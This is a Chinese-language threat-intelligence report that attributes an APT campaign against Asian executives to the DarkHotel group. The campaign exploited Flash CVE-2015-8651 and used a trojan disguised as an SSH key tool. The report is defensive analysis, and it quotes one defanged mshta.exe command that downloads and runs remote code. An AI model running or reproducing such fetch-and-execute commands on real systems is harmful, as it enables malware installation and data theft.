境外“暗黑客棧”組織對國內企業高管發起APT攻擊

Abode于12月28日發布了一個應急補丁用于修復Flash 播放器的多個安全漏洞。有線索表明其中之一已被用于APT(高級可持續性)攻擊，國外有媒體揣測其攻擊目標為國內某著名IT企業。

國內新興安全威脅情報服務公司微步在線溯源分析表明確有境外黑客團伙利用此漏洞針對中國及亞洲企業的高管發起APT攻擊，此團伙即代號為暗黑客棧（DarkHotel） 的APT攻擊組織。現階段尚不確定此攻擊是否有更復雜的背景。

威脅事件分析

在Adobe于12月28日發布的19個安全漏洞的應急（OOB）補丁中，CVE-2015-8651 被Adobe 標注為已用于APT攻擊。微步在線通過對多宗活躍APT威脅事件的跟蹤及對CVE-2015-8651攻擊的分析，確定了攻擊流及攻擊者身份。

通過對捕獲的可疑SWF文件進行分析，確認此樣本利用了Adobe Flash整數溢出漏洞 (即此次Adobe修復的CVE-2015-8651漏洞)。受攻擊者訪問此SWF文件后，漏洞利用成功會跳轉到下面這段shellcode:

其主要功能是下載一個名為update.exe 的文件到系統的%temp% 目錄下， 通過RC4解密并且通過ECHO加可執行文件的“MZ”頭來構建有效的PE文件，然后運行。

Update.exe約1.3Mb, 具有完整的文件屬性，偽裝成SSH密鑰生成工具：

通過逆向分析發現，木馬作者篡改和裁剪了正常的OpenSSL文件，篡改后的版本只提供一個參數：-genkeypair。無論是否傳遞此參數，木馬文件都會首先釋放一個公鑰在當前目錄用于干擾判斷，同時進入真正的惡意代碼部分。此樣本未進行代碼混淆，但是采用了多種反調試/反虛擬機技術及字段加密，通過檢測各種系統環境來判斷是否有反病毒軟件及沙箱存在，比如：

Update.exe是一個Trojan Downloader， 利用執行mshta.exe 來下載木馬文件，木馬文件服務器位于冰島。形式如下：

C:Windowssystem32mshta.exe hxxp://****.com/image/read.php…..

攻擊團伙分析

隨著對此攻擊事件的目標、工具、手法和過程更詳細的分析，微步在線發現其特點和暗黑客棧（Darkhotel）有著非常驚人的一致。

暗黑客棧（Darkhotel）APT攻擊團伙的蹤跡最早可以追溯到2007年，其從2010年開始更多的利用企業高管在商業旅行中訪問酒店網絡的時機，進行APT攻擊來竊取信息。因此在2014年卡巴斯基發布針對此團隊的研究報告時，將其命名為“Darkhotel”。此團伙攻擊目標集中在亞太地區開展業務和投資的企業高管（如：CEO、SVP、高管及高級研發人員），攻擊的行業包括大型電子制造和通信、投資、國防工業、汽車等。

此團隊使用零日漏洞（特別是Flash類型）來進行攻擊，并規避最新的防御措施，同時也會盜竊合法的數字證書為后門軟件及監聽工具進行簽名。如果有一個目標已經被有效感染，往往就會從作案點刪除他們的工具，進而隱藏自己的活動蹤跡。從其行動特點看，具有極高的技術能力及充沛的資源。

微步在線對此次事件和暗黑客棧（Darkhotel）的特點進行了對比，認為有充足理由認定其就是始作俑者。